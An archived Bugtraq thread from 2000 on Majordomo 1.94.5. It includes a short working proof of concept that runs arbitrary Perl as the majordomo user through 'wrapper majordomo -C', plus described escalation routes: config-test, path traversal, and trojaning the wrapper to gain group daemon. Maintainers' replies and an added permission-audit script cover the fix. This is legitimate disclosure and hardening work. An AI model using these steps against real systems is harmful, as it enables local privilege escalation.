4724116 2000-01-25  05:32  /39 lines/ Postmaster
Recipient: Bugtraq (import) <9493>
Subject: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>
Date:         Mon, 24 Jan 2000 14:55:42 -0600
Reply-To: Brock Sides <bsides@TOWERY.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Whereas majordomo 1.94.5 does fix the bug in resend, discovered by
Brock Tellier, that permits execution of arbitrary code as user
majordomo, it apparently does not fix the other bug in the script
majordomo, that permits execution of arbitrary config files as user
majordomo:

On a fresh install of majordomo 1.94.5 in /tmp:

[brock@o2 /tmp]$ id
uid=1116(brock) gid=1116(brock)
[brock@o2 /tmp]$ ls -l ./id.pl
-rwxr-xr-x    1 brock    brock         31 Jan 24 14:17 ./id.pl
[brock@o2 /tmp]$ cat id.pl
#!/usr/bin/perl

system("id");
[brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
uid=1126(majordomo) gid=1(daemon)
./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo
line 47.
[brock@o2 /tmp]$

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com
(4724116) ------------------------------------------(Rewrapped)

4727836 2000-01-25  21:03  /62 lines/ Postmaster
Recipient: Bugtraq (import) <9499>
Subject: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000125155609.D15450@monad.swb.de>
Date:         Tue, 25 Jan 2000 15:56:09 +0100
Reply-To: Olaf Kirch <okir@CALDERA.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Olaf Kirch <okir@CALDERA.DE>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>; from bsides@TOWERY.COM on Mon, Jan 24, 2000 at 02:55:42PM -0600

On Mon, Jan 24, 2000 at 02:55:42PM -0600, Brock Sides wrote:
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:

There are a number of ways to get majordomo to execute your perl code.
I mailed the developers a list of things I consider insecure
(like being able to give it a list name of ../../../../tmp/foo, and
it'll create /tmp/foo as majordomo). Other cool things include

wrapper config-test <your perl script file here>

You see, the recommended installation doesn't even distinguish
between debugging and production code -- anybody can run anything
in the majordomo directory with majordomo privs.

Another candidate is archive2.pl which has loads of funny options.
At least lets you write arbitrary files as user majordomo. Your
/usr/lib/majordomo directory owned by majordomo? Great--trojan the
wrapper binary and gain group daemon privilege from sendmail.

Their response to this has been that you should install wrapper
without world execute bit. On a sendmail system this means you
need to make it owned by group daemon so that sendmail can run it
(provided you run it from /etc/aliases):

	chown root.daemon wrapper
	chmod 4550 wrapper

If you think about it, this makes daemon and majordomo accounts
interchangeable. If I break daemon, I can become majordomo because of
all the holes in it. If I can become majordomo, I can also become
daemon--I just have to replace the wrapper program with my own binary
(the majordomo directory is owned by majordomo in the default
install).

I consider this broken, but I haven't been able to get more out of
them. That and the license that basically keeps us from shipping a
modified majordomo makes me seriously think about whether we shouldn't
just drop it altogether.

Olaf
--
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de    +-------------------- Why Not?! -----------------------
         UNIX, n.: Spanish manufacturer of fire extinguishers.
(4727836) ------------------------------------------(Rewrapped)
4727935 2000-01-25  21:43  /63 lines/ Postmaster
Recipient: Bugtraq (import) <9502>
Subject: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Dispatcher: imput version 991025(IM133)
Message-ID:  <20000125122028C.cwilson@unknown-domain>
Date:         Tue, 25 Jan 2000 12:20:28 +0100
Reply-To: Chan Wilson <cwilson@NEU.SGI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Chan Wilson <cwilson@NEU.SGI.COM>
X-To:         bsides@towery.com
X-cc:         BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>

Brock Sides <bsides@TOWERY.COM> spaketh thusly on Mon, 24 Jan 2000
14:55:42 -0600
	about majordomo 1.94.5 does not fix all vulnerabilities...
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:

Correct.  That is far better addressed at an o/s level by protecting
the directory that the majordomo code lives in.  A security note has
been added to the top of the INSTALL document that attempts to
highlight this matter:

	** SECURITY ALERT **
	
	   The default installation of Majordomo, including the checks that
	config-test does, WILL NOT RESULT IN A SECURE INSTALLATION.  In
	particular, the majordomo home directory and the "wrapper" program
	are, by default, accessible to any user.  These open privileges can be
	(mis)used to change list membership, list configuration details, forge
	email, perhaps even create and/or delete lists, and anything else that
	the majordomo user has permissions to do.
	
	   If Majordomo is *NOT* installed on a secured system with controlled
	access (and if you are paranoid, even if it is), you will need to take
	additional steps to prevent access to the majordomo directories.
	Usually, changing the privileges of the majordomo home directory to be
	0750 fixes these problems, but creates the additional burden of
	needing to configure the MTA (sendmail, qmail, exim) properly so that
	it can read and execute "wrapper".  Such configuration is beyond the
	scope of this install document, and is left to the FAQ (Doc/FAQ,
	Doc/majordomo-faq.html) and the support group
	majordomo-users@greatcircle.com to answer.
	
	** SECURITY ALERT **

While it is possible, as has been posted earlier, to patch all the
code that uses the -C configuration file flag, *and* patch resend to
only allow execution of code in specific directories, *and* rework
code so it knows where to find the relocated code, it is far easier to
simply prevent access to the majordomo directory (including access
log, list configuration, membership, etc) which gives security from
both execution of arbitrary code *and* information security for the
distribution lists.

--Chan
	majordomo maintainer.
(4727935) ------------------------------------------(Rewrapped)
4727964 2000-01-25  21:57  /35 lines/ Postmaster
Recipient: Bugtraq (import) <9504>
Subject: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <388DB92F.F5D0D137@visi.com>
Date:         Tue, 25 Jan 2000 08:54:39 -0600
Reply-To: Dave Barr <barr@VISI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Dave Barr <barr@VISI.COM>
X-To:         BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Brock Sides wrote:
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:

While people need to certainly be made clear of this, this is entirely
intentional.

The cleanest fix to the problem of the majordomo programs running
arbitrary code as the majordomo user/group is to fix the permissions
of the wrapper so it is mode o-rx.  (or that the Majordomo home
directory is mode 750)  Any other proposed solutions were
fraught with race conditions, partial fixes, and just plain
uglinesses.

This is clearly explained in the INSTALL document in 1.94.5 and
re-emphasized on the Majordomo FAQ.

--Dave
Majordomo FAQ maintainer
(4727964) ------------------------------------------(Rewrapped)
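An added permission audit (written for this archive page; it is not code from the thread or from the Majordomo distribution) that checks an install against the layout the three replies converge on: home directory 0750, and a wrapper that is setuid, has no world bits (4550) and is owned root:daemon as in Olaf's chown line. It assumes the directory passed as the first argument contains the wrapper binary; the owner and group arguments are optional and default to root and daemon.

```shell
#!/bin/sh
# Added audit script, not part of the thread or of Majordomo itself.
# Checks an install for the hardened layout the thread recommends:
# majordomo home 0750, wrapper setuid with no "other" bits (4550) and
# owned root:daemon, so local users cannot run "wrapper majordomo -C".
# Usage: audit_majordomo <majordomo home dir> [owner] [group]

mode_of()  { ls -ld "$1" | awk '{print $1}'; }   # e.g. -r-sr-x---
owner_of() { ls -ld "$1" | awk '{print $3}'; }
group_of() { ls -ld "$1" | awk '{print $4}'; }

# Directory must grant nothing to "other" (last three mode characters).
# Trailing * tolerates the ACL/SELinux marker some ls versions append.
check_home_dir() {
    case $(mode_of "$1") in
        d??????---*) return 0 ;;
        *) echo "FAIL: $1 is $(mode_of "$1"); want 0750" >&2; return 1 ;;
    esac
}

# wrapper must carry the setuid bit and have no "other" bits at all.
check_wrapper() {
    m=$(mode_of "$1")
    case $m in
        -??s??????*) ;;
        *) echo "FAIL: $1 is $m; setuid bit missing" >&2; return 1 ;;
    esac
    case $m in
        ???????---*) return 0 ;;
        *) echo "FAIL: $1 is $m; clear the world bits (4550)" >&2; return 1 ;;
    esac
}

# Root owner so the majordomo user cannot replace the binary (Olaf's
# trojan scenario); MTA group so sendmail can still exec it from aliases.
check_owner() {
    [ "$(owner_of "$1")" = "$2" ] && [ "$(group_of "$1")" = "$3" ] && return 0
    echo "FAIL: $1 is $(owner_of "$1"):$(group_of "$1"); want $2:$3" >&2
    return 1
}

audit_majordomo() {
    home=$1; owner=${2:-root}; group=${3:-daemon}; rc=0
    check_home_dir "$home"                          || rc=1
    check_wrapper "$home/wrapper"                   || rc=1
    check_owner "$home/wrapper" "$owner" "$group"   || rc=1
    [ "$rc" -eq 0 ] && echo "OK: $home matches the hardened layout"
    return "$rc"
}
```

Run it as `audit_majordomo /usr/lib/majordomo` after the chown/chmod steps above; a non-zero exit with FAIL lines on stderr means the -C config-file problem is still reachable by every local user.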